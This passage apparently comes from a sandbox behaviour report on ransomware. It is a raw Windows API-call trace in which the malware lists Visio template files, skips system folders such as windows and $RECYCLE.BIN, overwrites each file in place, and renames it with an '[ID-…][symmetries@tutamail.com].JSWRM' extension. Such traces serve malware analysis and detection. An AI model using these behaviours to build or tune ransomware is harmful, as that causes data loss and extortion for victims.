out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.248] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4ee0, lpOverlapped=0x0) returned 1 [0145.248] CloseHandle (hObject=0x314) returned 1 [0145.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.249] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c90082, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c90082, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c90082, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfcdf, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BORDRS_M.VSSX", cAlternateFileName="BORDRS~2.VSS")) returned 1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2=".") returned 1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="..") returned 1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="...") returned 1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="windows") returned -1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="recovery") returned -1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="perflogs") returned -1 [0145.249] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="documents and settings") returned -1 [0145.250] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.250] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="system volume information") returned -1 [0145.250] lstrcmpiW (lpString1="BORDRS_M.VSSX", lpString2="msocache") returned -1 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDRS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDRS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.251] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=64735) returned 1 [0145.251] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.251] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfcd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfcd0, lpOverlapped=0x0) returned 1 [0145.258] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.258] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfcd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfcd0, lpOverlapped=0x0) returned 1 [0145.258] CloseHandle (hObject=0x314) returned 1 [0145.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.259] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3c43bbb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c43bbb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c43bbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfc52, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BORDRS_U.VSSX", cAlternateFileName="BORDRS~1.VSS")) returned 1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2=".") returned 1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="..") returned 1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="...") returned 1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="windows") returned -1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="recovery") returned -1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="perflogs") returned -1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="documents and settings") returned -1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="system volume information") returned -1 [0145.260] lstrcmpiW (lpString1="BORDRS_U.VSSX", lpString2="msocache") returned -1 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDRS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BORDRS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BORDRS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.261] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=64594) returned 1 [0145.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.262] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfc50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfc50, lpOverlapped=0x0) returned 1 [0145.268] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.268] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfc50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfc50, lpOverlapped=0x0) returned 1 [0145.269] CloseHandle (hObject=0x314) returned 1 [0145.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BORDRS_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bordrs_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.270] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2255e, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", cAlternateFileName="BPMN_A~1.VST")) returned 1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2=".") returned 1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="..") returned 1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="...") returned 1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="windows") returned -1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="recovery") returned -1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="perflogs") returned -1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="documents and settings") returned -1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.270] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="system volume information") returned -1 [0145.271] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpString2="msocache") returned -1 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.272] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=140638) returned 1 [0145.272] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.272] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22550, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x22550, lpOverlapped=0x0) returned 1 [0145.315] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.315] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22550, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x22550, lpOverlapped=0x0) returned 1 [0145.316] CloseHandle (hObject=0x314) returned 1 [0145.316] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.319] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x27905, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", cAlternateFileName="BPMN_A~2.VST")) returned 1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2=".") returned 1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="..") returned 1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="...") returned 1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="windows") returned -1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="recovery") returned -1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="perflogs") returned -1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="documents and settings") returned -1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="system volume information") returned -1 [0145.319] lstrcmpiW (lpString1="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpString2="msocache") returned -1 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 34 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.321] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=162053) returned 1 [0145.321] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.321] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0145.380] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.380] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0145.380] CloseHandle (hObject=0x314) returned 1 [0145.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_ADDRESS_CHANGE_PROCESS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_address_change_process_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3d4ec4f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3d4ec4f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3d74ea0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2ae6f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_M.VSSX", cAlternateFileName="BPMN_M~1.VSS")) returned 1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2=".") returned 1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="..") returned 1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="...") returned 1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="windows") returned -1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="recovery") returned -1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="perflogs") returned -1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="documents and settings") returned -1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="system volume information") returned -1 [0145.418] lstrcmpiW (lpString1="BPMN_M.VSSX", lpString2="msocache") returned -1 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSSX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_M.VSSX", lpUsedDefaultChar=0x0) returned 11 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSSX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSSX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_M.VSSX", lpUsedDefaultChar=0x0) returned 11 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.420] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=175727) returned 1 [0145.420] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.420] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, 